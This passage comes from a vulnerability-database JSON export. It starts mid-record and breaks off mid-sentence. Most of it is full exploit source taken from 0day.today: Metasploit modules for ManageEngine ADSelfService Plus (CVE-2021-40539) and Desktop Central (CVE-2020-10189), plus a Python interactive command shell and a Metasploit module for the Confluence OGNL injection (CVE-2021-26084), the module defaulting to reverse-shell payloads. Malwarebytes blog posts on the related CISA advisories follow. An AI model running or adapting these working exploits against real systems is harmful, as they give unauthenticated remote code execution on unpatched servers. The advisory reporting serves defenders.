"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "zdt", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "1337DAY-ID-37080", "href": "https://0day.today/exploit/description/37080", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37080", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-22T13:22:19", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of that,\n the complete fix for the remote code execution vulnerability is now\n available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n ],\n ['Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ],\n ['PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 8383,\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'CmdStagerFlavor' => 'certutil', # This works without issue\n 'Notes' => {\n 'PatchedVersion' => Gem::Version.new('100474'),\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target is not responding to check')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central')\n end\n\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless version\n return CheckCode::Detected('Could not detect Desktop Central version')\n end\n\n vprint_status(\"Detected Desktop Central version #{version}\")\n\n if Gem::Version.new(version) < notes['PatchedVersion']\n return CheckCode::Appears(\"#{version} is an exploitable version\")\n end\n\n CheckCode::Safe(\"#{version} is not an exploitable version\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\n 'vars_get' => {'img' => '\\\\logger.zip'}\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-04T15:51:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36694", "href": "https://0day.today/exploit/description/36694", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.12.x versions before 7.12.5\n# Tested on: Linux Distros \n# CVE : CVE-2021-26084\n\n#!/usr/bin/python3\n\n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport optparse\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\n\noptions, args = parser.parse_args()\nsession = requests.Session()\n\nurl_vuln = options.url\nendpoint = options.path\n\nif not options.url or not options.path:\n\n print('[+] Specify an url target')\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\n print('[+] Example help usage: exploit.py -h')\n exit()\n\n\ndef banner():\n\n print('---------------------------------------------------------------')\n print('[-] Confluence Server Webwork OGNL injection')\n print('[-] CVE-2021-26084')\n print('[-] https://github.com/h3v0x')\n print('--------------------------------------------------------------- \\n')\n\n\ndef cmdExec():\n\n while True:\n cmd = input('> ')\n xpl_url = url_vuln + endpoint\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\n\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\n print(queryStringValue)\n\n\nbanner()\ncmdExec()\n", "sourceHref": "https://0day.today/exploit/36694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T11:22:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "zdt", "title": "Atlassian Confluence WebWork OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "1337DAY-ID-36730", "href": "https://0day.today/exploit/description/36730", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Tomcat user\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log\n # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n \"/bin/bash\",\n \"-c\",\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-09-17T14:35:09", "description": "In a [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) the FBI, the United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency (CISA) warn that advanced persistent threat (APT) cyber-actors may be exploiting a vulnerability in ManageEngine&#x27;s single sign-on (SSO) solution.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability in questions is listed under [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) as a REST API authentication bypass with resultant remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus version 6113 and prior.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This would allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it&#x27;s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network.\n\n### In-the-wild exploitation\n\nWhen [word of the vulnerability came out](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) it was already clear that is was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other [researchers](<https://twitter.com/voodoodahl1/status/1435673340539281410>) chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat-actor. Yesterday&#x27;s joint advisory seems to support that, telling us that APT cyber-actors are likely among those exploiting the vulnerability. \n\nThey find this of high concern since this poses a serious risk to critical infrastructure companies. CISA recognizes [16 critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) whose &quot;assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof.&quot;\n\nThe joint advisory points out that the suspected APT cyber-actors have targeted academic institutions, defense contractors, and critical infrastructure entities in multiple industry sectors\u2014including transportation, IT, manufacturing, communications, logistics, and finance.\n\nIt also warns that successful exploitation of the vulnerability allows an attacker to place web shells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\n\nAccording to the advisory, the JavaServer Pages web shell arrives as a `.zip` file &quot;masquerading as an x509 certificate&quot; called `service.cer`. The web shell is then accessed via the URL path `/help/admin-guide/Reports/ReportGenerate.jsp`. \n\nHowever, it warns:\n\n> Confirming a successful compromise of ManageEngine ADSelfService Plus may be difficult\u2014the attackers run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the web shell.\n\nPlease consult the advisory for a [full list of IOCs](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>).\n\n### Mitigation\n\nA patch for this vulnerability was made available on September 7, 2021. Users are advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urge organizations to make sure that ADSelfService Plus is not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations. It also has information about how you can reach out to support if you need further information, have any questions, or face any difficulties updating ADSelfService Plus.\n\nStay safe, everyone!\n\nThe post [FBI and CISA warn of APT groups exploiting ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-17T13:48:46", "type": "malwarebytes", "title": "FBI and CISA warn of APT groups exploiting ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-17T13:48:46", "id": "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) 